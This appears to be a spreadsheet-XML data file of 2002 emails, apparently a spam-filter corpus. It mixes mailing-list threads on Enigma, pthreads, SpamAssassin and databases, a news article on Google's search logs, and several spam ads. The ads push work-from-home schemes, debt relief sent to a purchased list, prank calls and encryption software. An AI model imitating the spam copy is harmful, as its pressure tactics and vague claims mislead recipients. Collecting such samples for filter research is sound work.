 Cc: "R. A. Hettinga" &lt;rah@shipwright.com&gt;,
    Digital Bearer Settlement List &lt;dbs@philodox.com&gt;,
    cryptography@wasabisystems.com
 At 01:30 AM 10/2/2002 -0400, John S. Denker wrote:
 &gt;"R. A. Hettinga" wrote:
 &gt;...
 &gt; &gt; "the first computer to crack enigma was optical"
 &gt;1) Bletchley Park used optical sensors, which were (and
 &gt;still are) the best way to read paper tape at high speed.
 &gt;You can read about it in the standard accounts, e.g.
 &gt;   http://www.picotech.com/applications/colossus.html
 But Colossus was not for Enigma. The bombes used for Enigma were
 electro-mechanical. I'm not aware of any application of optical techniques
 to Enigma, unless they were done in the US and are still classified. And
 clearly, the first bulk breaks of Enigma were done by the bombes, so I
 guess it depends whether you count bombes as computers or not, whether this
 statement has any credibility at all.
 Greg.
 Williams/Zenon 2004 campaign page: http://www.ben4prez.org
 Greg Rose                                       INTERNET: ggr@qualcomm.com
 Qualcomm Australia          VOICE:  +61-2-9817 4188   FAX: +61-2-9817 5199
 Level 3, 230 Victoria Road,                http://people.qualcomm.com/ggr/
 Gladesville NSW 2111    232B EC8F 44C6 C853 D68F  E107 E6BF CD2F 1081 A37C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</si>
  <si>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Paddick backers angry at Met move
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8688973,215/
 Date: 2002-10-09T03:15:18+01:00
 *UK latest:* Met blocks Brian Paddick returning to his job as commander of 
 Lambeth by appointing him to another post.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] Re: Web subscription for spamassassin package
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; eh? any reason why?  wasn't causing any trouble for me, and
 &gt; seems like a good idea.
 Because every time someone submitted a bug, they'd get a response
 saying "Message is held for moderator because of implicit message
 destination" or something like that. It annoyed users, it annoyed me,
 and Justin, you never actually got around to accepting the messages :-)
 -- 
 Duncan Findlay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</si>
  <si>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[IIU] Postcards from Planet Google *LONG*
</t>
  </si>
  <si>
    <t xml:space="preserve">I found this interesting, but not very original. Another search engine 
 (can't remember which one tho') was doing this a long time ago.
 http://www.bangkokpost.com/Business/02Dec2002_biz54.html
 =====
 Postcards from Planet Google
 INTERNET: The search engine is taking snapshots of its users' minds and 
 aggregating them. So what is the world thinking about?
 JENNIFER 8. LEE
 At Google's squat headquarters off Route 101, visitors sit in the lobby, 
 transfixed by the words scrolling by on the wall behind the 
 receptionist's desk: animacio{AAC}n japonese Harry Potter pense{AAC}es 
 et poemes associao brasileira de normas te{AAC}cnicas.
 The projected display, called Live Query, shows updated samples of what 
 people around the world are typing into Google's search engine. The 
 terms scroll by in English, Chinese, Spanish, Swedish, Japanese, Korean, 
 French, Dutch, Italian _ any of the 86 languages that Google tracks.
 The scrolling continues: people who shouldn't marry ``she smoked a 
 cigar'' mr potatoheads in long island pickup lines to get women auto 
 theft fraud how to.
 Stare at Live Query long enough, and you feel you are watching the 
 collective consciousness of the world stream by.
 Each line represents a thought from someone, somewhere with an Internet 
 connection. Google collects these queries _ 150 million a day from more 
 than 100 countries _ in its databases, updating and storing the computer 
 logs millisecond by millisecond.
 Google is taking snapshots of its users' minds and aggregating them.
 So what is the world thinking about?
 Sex, for one thing.
 ``You can learn to say `sex' in a lot of different languages by looking 
 at the logs,'' said Craig Silverstein, director of technology at Google. 
 (To keep Live Query G-rated, Google filters out sex-related searches, 
 though less successfully with foreign languages.)
 Despite its geographic and ethnic diversity, the world is spending much 
 of its time thinking about the same things. The same topic areas bubble 
 to the top: celebrities, current events, products and computer downloads.
 ``It's amazing how similar people are all over the world based on what 
 they are searching for,'' said Greg Rae, one of three members of 
 Google's logs team, which is responsible for building, storing and 
 protecting the data record.
 Google's following _ it is the most widely used search engine _ has 
 given Mr Rae a worldview from his cubicle. Since October 2001, he has 
 been able to reel off ``anthrax'' in several languages, including 
 milzbrand in German and carbonchio in Italian. He says he can also tell 
 which countries took their recent elections seriously (Brazil and 
 Germany), because of the frenzy of searches. He notes that the 
 globalisation of consumer culture means that the most popular brands are 
 far-flung in origin: Nokia, Sony, BMW, Ferrari, Ikea and Microsoft.
 Judging from Google's data, some sports events stir interest almost 
 everywhere: the Tour de France, Wimbledon, the Melbourne Cup horse race 
 and the World Series were among the top 10 sports-related searches last 
 year. It also becomes obvious just how familiar American movies, music 
 and celebrities are to searchers across the globe. Two years ago, a 
 Google engineer named Lucas Pereira noticed that searches for Britney 
 Spears had declined, indicating what he thought must be a decline in her 
 popularity. From that observation grew Google Zeitgeist, a listing of 
 the top gaining and declining queries of each week and month.
 Glancing over Google Zeitgeist is like taking a trivia test in cultural 
 literacy: Ulrika Jonsson, the Swedish-born British television host and 
 girlfriend of England football coach Sven Goran Eriksson, made the list 
 recently. So did Irish Travellers (a nomadic ethnic group, one of whose 
 members was videotaped beating her young daughter in Indiana) and 
 fentanyl (the narcotic gas used in the Moscow raid to rescue hostages 
 taken by Chechen rebels in late October).
 The long-lasting volume of searches involving her name has made Britney 
 Spears something of a benchmark for the logs team. It has helped them 
 understand how news can cause spikes in searches, as it did when she 
 broke up with Justin Timberlake.
 Google can feel the reverberations of such events, and others of a more 
 serious nature, immediately.
 On Feb 28, 2001, for example, an earthquake began near Seattle at 10:54 
 am local time. Within two minutes, earthquake-related searches jumped to 
 250 a minute from almost none, with a concentration in the US Pacific 
 Northwest. On Sept 11, searches for the World Trade Center, Pentagon and 
 CNN shot up immediately after the attacks. Over the next few days, 
 Nostradamus became the top search query, fuelled by a rumour that 
 Nostradamus had predicted the trade center's destruction.
 But the most trivial events may also register on Google's sensitive 
 cultural seismic meter.
 The logs team came to work one morning to find that ``carol brady maiden 
 name'' had surged to the top of the charts.
 Curious, they mapped the searches by time of day and found that they 
 were neatly grouped in five spikes, each one starting at 48 minutes 
 after the hour.
 As the logs were passed through the office, employees were perplexed. 
 Why would there be a surge in interest in a character from the 1970s 
 sitcom The Brady Bunch? But the data could only reflect patterns, not 
 explain them.
 That is a paradox of a Google log: it does not capture social phenomena 
 per se, but merely the shadows they cast across the Internet.
 ``The most interesting part is why,'' said Amit Patel, who has been a 
 member of the logs team. ``You can't interpret it unless you know what 
 else is going on in the world.''
 So what had gone on on April 22, 2001?
 That night the million-dollar question on the game show Who Wants to Be 
 a Millionaire? had been, ``What was Carol Brady's maiden name?'' Seconds 
 after the show's host posed the question, thousands flocked to Google to 
 search for the answer (Tyler), producing four spikes as the show was 
 broadcast successively in each US time zone.
 The precision of the Carol Brady data was eye-opening for some.
 ``It was like trying an electron microscope for the first time,'' said 
 Sergey Brin, who as a graduate student in computer science at Stanford 
 helped found Google in 1998 and is now its president for technology. 
 ``It was like a moment-by-moment barometer.''
 Predictably, Google's query data respond to television, movies and 
 radio. But the mass media also feed off the demands of their audiences. 
 One of Google's strengths is its predictive power, flagging trends 
 before they hit the radar of other media.
 As such it could be of tremendous value to entertainment companies or 
 retailers. Google is quiet about what if any plans it has for 
 commercialising its vast store of query information. ``There is 
 tremendous opportunity with this data,'' Mr Silverstein said. ``The 
 challenge is defining what we want to do.''
 Google currently does not allow outsiders to gain access to raw data 
 because of privacy concerns. Searches are logged by time of day, 
 originating IP address (information that can be used to link searches to 
 a specific computer), and the sites on which the user clicked. People 
 tell things to search engines that they would never talk about publicly 
 _ Viagra, pregnancy scares, fraud, facelifts. What is interesting in the 
 aggregate can be seem an invasion of privacy if narrowed to an individual.
 In aggregate form, Google's data can make a stunning presentation. Next 
 to Mr Rae's cubicle is the GeoDisplay, a 40-inch screen that gives a 
 three-dimensional geographical representation of where Google is being 
 used around the globe. The searches are represented by coloured dots 
 shooting into the atmosphere. The colours _ red, yellow, orange _ convey 
 the impression of a globe whose major cities are on fire. The tallest 
 flames are in New York, Tokyo and the San Francisco Bay area.
 Each country has a distinctive usage pattern. Spain, France and Italy 
 have a midday lull in Google searches, presumably reflecting leisurely 
 lunches and relaxation. In Japan, the peak usage is after midnight, when 
 phone rates for dial-up modems drop.
 Google's worldwide scope means that the company can track ideas and 
 phenomena as they hop from country to country.
 Take Las Ketchup, a trio of singing sisters who became a sensation in 
 Spain last spring with a gibberish song and accompanying knee-knocking 
 dance similar to the Macarena.
 Like a series of waves, Google searches for Las Ketchup undulated 
 through Europe over the summer and fall.
 The Ketchup Song (Hey Hah) has already topped the charts in 18 
 countries. In late summer, Google's logs show, Las Ketchup searches 
 began a strong upward climb in the United States, Britain and the 
 Netherlands.
 Haven't heard of Las Ketchup?
 If you haven't, Google predicts you soon will.
 ===
 rgrds,
 Bernard
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: If it's too loud, you're too French
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85513605
 Date: Not supplied
 The French and the iPod aren't getting along -- the iPod outputs more decibels 
 through its headphones than are legal in La Belle France. Link[1] Discuss[2] (_
 Thanks, Ernie[3]!_)
 [1] http://translate.google.com/translate?u=http%3A%2F%2Fwww.macgeneration.com%2Fmgnews%2Fdepeche.php%3FaIdDepeche%3D93540&amp;langpair=fr%7Cen&amp;hl=en&amp;ie=ISO-8859-1&amp;prev=%2Flanguage_tools
 [2] http://www.quicktopic.com/boing/H/LMHmGmnSwgPG
 [3] http://www.psylux.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] FWD [UASR][TheHickmanReport] Jets Attempt to Intercept 'Contrail'
</t>
  </si>
  <si>
    <t xml:space="preserve">Jets Attempt to Intercept 'Contrail' 
 By ROBERT BURNS
 AP Military Writer 
 WASHINGTON (AP)--The military command responsible for the defense of North
 American airspace scrambled fighter jets in response to unverified reports
 of an airborne condensation trail, or contrail, moving from the Caribbean to
 the United States, defense officials said Thursday. 
 Lt. Col. Michael Humm, a Pentagon spokesman, said the incident happened
 Wednesday and that the North American Aerospace Defense Command in Colorado
 Springs, Colo., was continuing to investigate. 
 The reported contrail stirred concern because of the possibility that it
 could have indicated the presence of an unauthorized jet aircraft in or
 approaching American airspace. In the aftermath of the Sept. 11 attacks, the
 Pentagon has taken greater precautions to monitor U.S. airspace. 
 A contrail is created by vapor from a jet engine in the presence of cold
 air. 
 The jets that were scrambled to attempt to intercept and identify the source
 of the contrail found nothing, said Lt. Cmdr. Curtis Jenkins, a NORAD
 spokesman. He said NORAD had developed no new information since the initial
 report at 4 p.m. EST on Wednesday. NORAD is reviewing data from its tracking
 radars in search of evidence, he said. 
 A Pentagon statement said NORAD received unverified reports of ``what
 appeared to be a contrail of unknown origin,'' originally in the vicinity of
 the Turks and Caicos Islands in the Caribbean. 
 ``Initially, it was reported to be heading northwestward toward the United
 States,'' the statement said. ``Commercial airline pilots later reported the
 contrail over Florida and later over Indiana. Thereafter, no other sightings
 were reported.'' 
 The reported contrail was never verified by visual or radar contact, the
 Pentagon statement said. 
 At the Federal Aviation Administration, spokesman Paul Turk said, ``I'm
 aware of the reports.'' He referred all questions to NORAD. 
 Jenkins said he was not sure who reported the initial sighting over the
 Caribbean. He also was unsure who requested NORAD to launch fighter jets or
 from which military bases they were scrambled. 
 ``We don't necessarily judge or second-guess when a request comes to us to
 investigate'' a contrail, he said. 
 Meanwhile, reports of a ball of fire streaking across the sky early Thursday
 had people throughout the Northwest flooding radio and television stations
 with calls reporting a meteor shower. 
 It was believed that the light came from a Russian rocket body re-entering
 the Earth's atmosphere about 6:15 a.m. The U.S. Strategic Command in Omaha,
 Neb., and the North American Aerospace Defense Command confirmed a Russian
 rocket fell back to Earth, but gave no further details. 
 AP-NY-11-28-02 1833EST
 Copyright 2002, The Associated Press. The information contained in the AP
 Online news report may not be published, broadcast or redistributed without
 the prior written authority of The Associated Press.
 -- 
 Terry W. Colvin, Sierra Vista, Arizona (USA) &lt; fortean1@mindspring.com &gt;
      Alternate: &lt; fortean1@msn.com &gt;
 Home Page: &lt; http://www.geocities.com/Area51/Stargate/8958/index.html &gt;
 Sites: * Fortean Times * Mystic's Haven * TLCB *
       U.S. Message Text Formatting (USMTF) Program
 ------------
 Member: Thailand-Laos-Cambodia Brotherhood (TLCB) Mailing List
    TLCB Web Site: &lt; http://www.tlc-brotherhood.org &gt;[Vietnam veterans,
 Allies, CIA/NSA, and "steenkeen" contractors are welcome.]
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hilarious Prank Call Service
</t>
  </si>
  <si>
    <t xml:space="preserve">Please visit http://ukprankcalls.com to play a hilarious joke on your mates!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hanson is always good.
 One of my sci-fi authors is planning on slipping the following line into
 one of their stories:
 "The worst strategic mistake since the 911 attacks".
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Bill
 &gt; Stoddard
 &gt; Sent: Wednesday, September 11, 2002 9:37 AM
 &gt; To: Fork@Xent.Com
 &gt; Subject: Hanson's Sept 11 message in the National Review
 &gt; 
 &gt; 
 &gt; http://www.nationalreview.com/hanson/hanson091102.asp
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] linux pthreads problem
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; -----Original Message-----
 &gt; From: Vincent Cunniffe [mailto:vincent@cunniffe.net]
 &gt; Sent: 20 August 2002 10:43
 &gt; To: ilug
 &gt; Subject: Re: [ILUG] linux pthreads problem
 &gt; 
 &gt; Padraig Brady wrote:
 &gt; &gt; Vincent Cunniffe wrote:
 &gt; &gt;
 &gt; &gt;&gt;
 &gt; &gt;&gt; Possibly. However, the amount of memory in use is stupid :
 &gt; &gt;&gt;
 &gt; &gt;&gt; I start 50 threads, and the memory usage goes up to 411436 VSZ/840 RSS.
 &gt; &gt;&gt;
 &gt; &gt;&gt; Then I stop those threads, and the usage stays there. I start another
 &gt; 50
 &gt; &gt;&gt; threads, and the usage goes up to 821036 VSZ/1040 RSS. So, it's neither
 &gt; &gt;&gt; freeing the resources correctly nor reusing them :-/
 &gt; &gt;&gt;
 &gt; &gt;&gt; I've found several other people seeing the same VSZ issue with
 &gt; pthreads,
 &gt; &gt;&gt; spread over a long time, but no solution as yet.
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; Err, Is your code fixed now?
 &gt; &gt; You need a seperate pthread_t per thread.
 &gt; 
 &gt; I've tested it with and without separate pthread_t's, and the problem is
 &gt; identical, unfortunately.
 &gt; 
 &gt; Regards,
 &gt; 
 &gt; Vin
 &gt; 
 &gt; 
 &gt; --
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
 &gt; information.
 &gt; List maintainer: listmaster@linux.ie
 Are you using pthread_join(somethread,0);
 When you are closing off your instanciated thread made from
 pthread_t*somethread ?
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: STAY HOME AND EARN MONEY
</t>
  </si>
  <si>
    <t xml:space="preserve">Do you want to make money from home?  Are you tired
 of working for someone else? Then welcome to the 
 future.  
 http://www.lotsonet.com/homeopp/
 Due to our overwhelming growth of nearly 1,000% 
 over the last three years, we have an immediate 
 need and are willing to train and develop even 
 non-experienced individuals in local markets.
 http://www.lotsonet.com/homeopp/
 We are a 14 year old Inc 500 company.  Are you 
 willing to grow?  Are you ready to take on the
 challenges of the future?  Than we want you!
 Simply click on the link below for free information!
 No obligation whatsoever.
 http://www.lotsonet.com/homeopp/
 To be removed from this list go to:
 www.lotsonet.com/homeopp/remove.html
 6725ppxR2-400ZydL68l18
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: HTTP: The Definitive Guide
</t>
  </si>
  <si>
    <t xml:space="preserve">"HTTP: The Definitive Guide" documents everything 
 technical people need for using HTTP efficiently. 
 Written by experts with years of practical and 
 teaching experience, this book is the definitive 
 resource on HTTP and related core web technologies 
 because it clearly explains the "why" as well as 
 the "how." Readers will learn how web applications 
 work, how the core internet protocols and architectural 
 building blocks interact, and how to correctly implement 
 internet clients and servers.
 To order your copy or for more information
 (including sample chapter, Table of Contents, 
 index, etc), see:
 http://www.oreilly.com/catalog/httptdg/?CMP=EM8586
 or call 1-800-998-9938
 or email orders@oreilly.com
 HTTP: The Definitive Guide 
 By David Gourley, Brian Totty
 With Marjorie Sayer, Sailu Reddy, Anshu Aggarwal
 1-56592-509-2, Order Number: 5092
 656 pages, $44.95 US $69.95 CA 31.95 UK
 http://www.oreilly.com/catalog/httptdg/?CMP=EM8586
 -----------------------------------------------------------------
 If you want to cancel your subscription to this 
 newsletter, or add subscriptions to other topics, 
 go to: http://www.oreillynet.com/cs/user/home 
 For non-automated human help email 
 help@oreillynet.com
 ---------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Snow
</t>
  </si>
  <si>
    <t xml:space="preserve">September Haiku
 Freezing my ass off
 Air conditioning on high
 heats small apartment.
 Cindy, in Mississippie
 P.S. this one's for you, geege.
 On Tue, 10 Sep 2002, Paul Chvostek wrote:
 &gt; 
 &gt; I can tell I'm not the only one without air conditioning.  ;-)
 &gt; 
 &gt; Maybe I'll move to Canmore.  &lt;sigh&gt;
 &gt; 
 &gt; p
 &gt; 
 &gt; 
 &gt; On Tue, Sep 10, 2002 at 03:37:08PM -0400, Swerve wrote:
 &gt; &gt; 
 &gt; &gt; moo hahahaha.
 &gt; &gt; 
 &gt; &gt; i need a smoke.
 &gt; &gt; 
 &gt; &gt; stop this heatwave.
 &gt; &gt; 
 &gt; &gt; bring on winter.
 &gt; &gt; 
 &gt; &gt; bring on fall.
 &gt; &gt; 
 &gt; &gt; 
 &gt; &gt; Swerve, shut up.
 &gt; &gt; 
 &gt; &gt; bye.
 &gt; 
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] PostgreSQL vs. MySQL
</t>
  </si>
  <si>
    <t xml:space="preserve">Sean O'Donnell wrote:
 &gt; Doesnt answer your question, but theres a very simple reason i 
  &gt; develop a lot on mysql, it runs on windows and linux, a lot of
  &gt; clients only have windows servers, and last time i checked
  &gt; you can only run postgresql on windows with a lot of fecking
 &gt; around with cygwin. give postgres a decent standalone windows 
  &gt; build and i reckon you would see a lot of defections.
 This is pertinent: http://lwn.net/Articles/17067/
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Twilight Zone
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000231.html
 Date: 2002-10-09T22:50:35-08:00
 My Tivo has been picking up the Twilight Zone for the last few weeks. I have to 
 say, I'm really enjoying it. It reminds me of the old ones. It's good to have 
 it back on the air....
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] SpamAssassin an Razor problem
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi....
 i installed razor an SpamAssassin on an redhat 6.3 with a fresh per 5.8.0.
 when I install Mail::SpamAssassin using the CPAN the followin error in make
 test appears.
 t/forged_rcvd...........ok
 t/nonspam...............ok
 t/razor.................        Test skipped: Razor is not installed.
 t/razor.................ok
         2/2 skipped: Razor is not installed.
 t/reportheader..........ok
 How can i get the razor running with the SpamAssassin ?
 Thanks for helping
 Alex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</si>
  <si>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[IRR] [dgc.chat] First public release of NeuDist Distributed
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Status: RO
 Subject: [dgc.chat] First public release of NeuDist Distributed Transaction
 Clearing	Framework
 From: Pelle Braendgaard &lt;pelle@neubia.com&gt;
 To: dgcchat@lists.goldmoney.com
 Cc: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;, DGCChat
 &lt;dgcchat@lists.goldmoney.com&gt;, xmlx &lt;xml-api@intertrader.com&gt;
 Date: 19 Sep 2002 00:05:39 -0500
 Reply-To: &lt;dgcchat@lists.goldmoney.com&gt;
 I'm happy to announce the first public release of NeuDist
 NeuDist is an Open Source Software framework for building applications
 for the Neubia Distributed Clearing Platform.
 This release contains early java libraries and documentation that would
 primarily be of interest to developers.
 Talking about documentation, it is still a bit slim and mainly oriented
 towards people with experience in Java/XML development.
 There are currently no sample applications, but they will be available
 in the next release.
 The framework currently contains the following:
 - Classes for creating "Named Objects", which are authenticated using
 digital signatures within a hierarchy.
 - Storage framework for "Named Objects".
 - Simple XML-Signature implementation (Almost certainly not yet
 interoperable with other implementations)
 - Simple SOAP client
 - Simple Servlet API for handling SOAP requests based on "Named
   Objects".
 - Current types of "Named Objects" include:
     NameSpace objects -- for maintaining the NameSpace Authentication
  	Framework
     AuthenticationTickets -- for doing web site authentication using
 	digital signatures.
 Next major release is scheduled to contain:
  - Core:
 	hard coded root public key, for authenticating top level 	NameSpaces
  - Signing Services:
 	Implementation of web based signing services
 	End user hosted signing service
  - Example User Authentication Application
  - Example Payment System based on NeuDist
 I will be expanding the documentation over the next few weeks. This will
 cover not only more indepth technical documentation, but also higher
 level documentation about the business side of things.
 Read more about NeuDist or download our early version at
 http://neudist.org
 I would love to hear your questions and suggestions. To discuss it
 further please join neudist-discuss@lists.sourceforge.net
 You can join it at:
 http://lists.sourceforge.net/mailman/listinfo/neudist-discuss
 Regards
 Pelle
 -- 
 Antilles Software Ventures SA 		http://neubia.com/asv
 My Web Log Live and Direct from Panama	http://talk.org
 Views of an EconoFist			http://econofist.com
 subscribe: send blank email to dgcchat-join@lists.goldmoney.com
 unsubscribe: send blank email to dgcchat-leave@lists.goldmoney.com
 digest: send an email to dgcchat-request@lists.goldmoney.com
 with "set yourname@yourdomain.com digest=on" in the message body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_______________________________________________
 Irregulars mailing list
 Irregulars@tb.tf
 http://tb.tf/mailman/listinfo/irregulars
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Adv: Your road to FINANCIAL FREEDOM begins here!
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_84815C5ABAF209EF376268C8
 Content-type: text/plain; charset=US-ASCII
 Content-Transfer-Encoding: quoted-printable
 Are you overwhelmed with debt and high interest rates?=20
 Are you receiving annoying calls from creditors?=20
 How soon are you going to fix your credit situation?=20
 Tomorrow? Next Week? Next Month?=20
 Why not RIGHT NOW?=20
 We will provide professional help to reduce your interest rates and minimu=
 m payments!=20
 We offer FREE information and resources to provide with fast relief from c=
 redit cards and other types of debt=2E=20
 Find out why our program is the #1 way for having a debt free life=2E=20
 Visit us at http://www=2Emydebtsite=2Ecom/myhome=2Ehtm today!=20
 This email address was obtained from a purchased list=2E If you wish to un=
 subscribe from this list, please click here and enter the email address(es=
 ) you want to have removed from all future emails =2E If you have previous=
 ly unsubscribed and are still receiving this message, you may email our Ab=
 use department at abuse@mydebtsite=2Ecom or write us at: No Spam - mydebts=
 ite=2Ecom, P=2EO=2E Box 770594, Coral Springs, FL 33077=2E=20
 ------=_NextPart_84815C5ABAF209EF376268C8
 Content-Type: text/html; charset=US-ASCII
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4=2E0 Transitional//EN"&gt;
 &lt;!-- saved from url=3D(0039)http://www=2Eplatinumriver=2Ecom/x/debt=2Ehtm =
 --&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;&lt;LINK=20
 href=3D"platinumriverstyle=2Ecss" type=3Dtext/css rel=3Dstylesheet&gt;
 &lt;META content=3D"MSHTML 5=2E50=2E4916=2E2300" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY&gt;Are you overwhelmed with &lt;STRONG&gt;debt&lt;/STRONG&gt; and &lt;STRONG&gt;high=20
 interest&lt;/STRONG&gt; rates? &lt;BR&gt;&lt;BR&gt;Are you receiving annoying calls from=20
 creditors? &lt;BR&gt;&lt;BR&gt;How soon are you going to fix your credit situation?=20=
 &lt;BR&gt;&lt;BR&gt;Tomorrow? Next Week? Next Month? &lt;BR&gt;&lt;BR&gt;Why not &lt;STRONG&gt;&lt;U&gt;&lt;A=20
 href=3D"http://www=2Emydebtsite=2Ecom/myhome=2Ehtm"&gt;RIGHT NOW&lt;/A&gt;&lt;/U&gt;&lt;/STR=
 ONG&gt;?=20
 &lt;BR&gt;&lt;BR&gt;We will provide professional help to reduce your interest rates an=
 d=20
 minimum payments! &lt;BR&gt;&lt;BR&gt;We offer &lt;STRONG&gt;&lt;U&gt;&lt;A=20
 href=3D"http://www=2Emydebtsite=2Ecom/myhome=2Ehtm"&gt;FREE&lt;/A&gt;&lt;/U&gt;&lt;/STRONG&gt; =
 information=20
 and resources to provide with fast relief from credit cards and other type=
 s of=20
 debt=2E &lt;BR&gt;&lt;BR&gt;Find out why our program is the &lt;STRONG&gt;&lt;U&gt;#1&lt;/U&gt;&lt;/STRONG&gt;=
  way for=20
 having a debt free life=2E &lt;BR&gt;&lt;BR&gt;Visit us at &lt;A=20
 href=3D"http://www=2Emydebtsite=2Ecom/myhome=2Ehtm"&gt;http://www=2Emydebtsit=
 e=2Ecom/myhome=2Ehtm&lt;/A&gt;=20
 today! &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;This email address was obtained from a purc=
 hased=20
 list=2E If you wish to unsubscribe from this list, please click here and e=
 nter the=20
 email address(es) you want to have removed from all future emails =2E If y=
 ou have=20
 previously unsubscribed and are still receiving this message, you may emai=
 l our=20
 Abuse department at abuse@mydebtsite=2Ecom or write us at: No Spam -=20
 mydebtsite=2Ecom, P=2EO=2E Box 770594, Coral Springs, FL 33077=2E &lt;/BODY&gt;&lt;=
 /HTML&gt;
 ------=_NextPart_84815C5ABAF209EF376268C8--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-09-04
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Perl CMS Systems
     * 1998 Perl Conference CD Online
     * Bricolage 1.4.0 Escapes!
 +--------------------------------------------------------------------+
 | Perl CMS Systems                                                   |
 |   posted by ziggy on Tuesday September 03, @05:00 (tools)          |
 |   http://use.perl.org/article.pl?sid=02/09/02/1827239              |
 +--------------------------------------------------------------------+
 KLB writes "[0]Krow, one of the authors of [1]Slash, has written up a
 [2]review on [3]Linux.com of two other Perl CMS systems, the E2 and LJ
 engines. Makes for interesting reading."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/02/1827239
 Links:
     0. http://krow.net/~
     1. http://slashcode.com/
     2. http://newsforge.com/article.pl?sid=02/08/28/0013255&amp;mode=thread&amp;tid=49
     3. http://linux.com/
 +--------------------------------------------------------------------+
 | 1998 Perl Conference CD Online                                     |
 |   posted by gnat on Tuesday September 03, @19:34 (news)            |
 |   http://use.perl.org/article.pl?sid=02/09/03/2334251              |
 +--------------------------------------------------------------------+
 [0]gnat writes "[1]The 1998 Perl Conference CD is online on perl.org.
 Enjoy the blast from the past (was [2]this Damian's first public
 appearance?)" (thanks to Daniel Berger for packratting the CD!)
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/03/2334251
 Links:
     0. mailto:gnat@oreilly.com
     1. http://www.perl.org/tpc/1998/
     2. http://www.perl.org/tpc/1998/User_Applications/Declarative%20Command-line%20Inter/
 +--------------------------------------------------------------------+
 | Bricolage 1.4.0 Escapes!                                           |
 |   posted by chip on Tuesday September 03, @19:57 (tools)           |
 |   http://use.perl.org/article.pl?sid=02/09/04/002204               |
 +--------------------------------------------------------------------+
 [0]Theory writes "Bricolage 1.4.0 has finally escaped the shackles of its
 CVS repository! ... Bricolage is a full-featured, enterprise-class
 content management and publishing system. It offers a browser-based
 interface for ease-of use, a full-fledged templating system with complete
 programming language support for flexibility, and many other features
 (see below). It operates in an Apache/mod_perl environment, and uses the
 PostgreSQL RDBMS for its repository."
 This story continues at:
     http://use.perl.org/article.pl?sid=02/09/04/002204
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/04/002204
 Links:
     0. http://bricolage.cc/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</si>
  <si>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Sorry about that, new machine, had set the time right, forgot about the
 date :(
 On Fri, 2002-07-19 at 09:29, Doug Stewart wrote:
 &gt; Set your clock to the correct time, for the love of
 &gt; all things holy (and my sanity...).
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Computer File Protection
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear hulkjr ,
 WANT THE BEST IN COMPUTER FILE SECURITY?
 In today's society of computer hacking, identity theft and general snooping, it is 
 more important than ever to take precautions to protect your privacy.  The Internet 
 is by far the preferred manner of communication in today's fast paced world.  It does, 
 however, present privacy concerns when communicating personal or confidential 
 information.  It also provides computer hackers an extensive playground, with your 
 identity and financial information as the grand prize.
 Lock &amp; Key Encrypter is the perfect solution to these privacy concerns.  This affordable, 
 easy to use software encrypts your computer files for safe storage or transmittal 
 over the Internet. 
 Don't Become A Victim.  Protect your privacy and your financial well being.  
 Order Today! This is a Limited Time Offer at this amazing low price $19.99
 Visit our SECURE website for an in-depth look at this product:
 http://www299.fastwebsnet.com
 To be eliminated from future marketing:
 http://www299.fastwebsnet.com/takemeoff.html
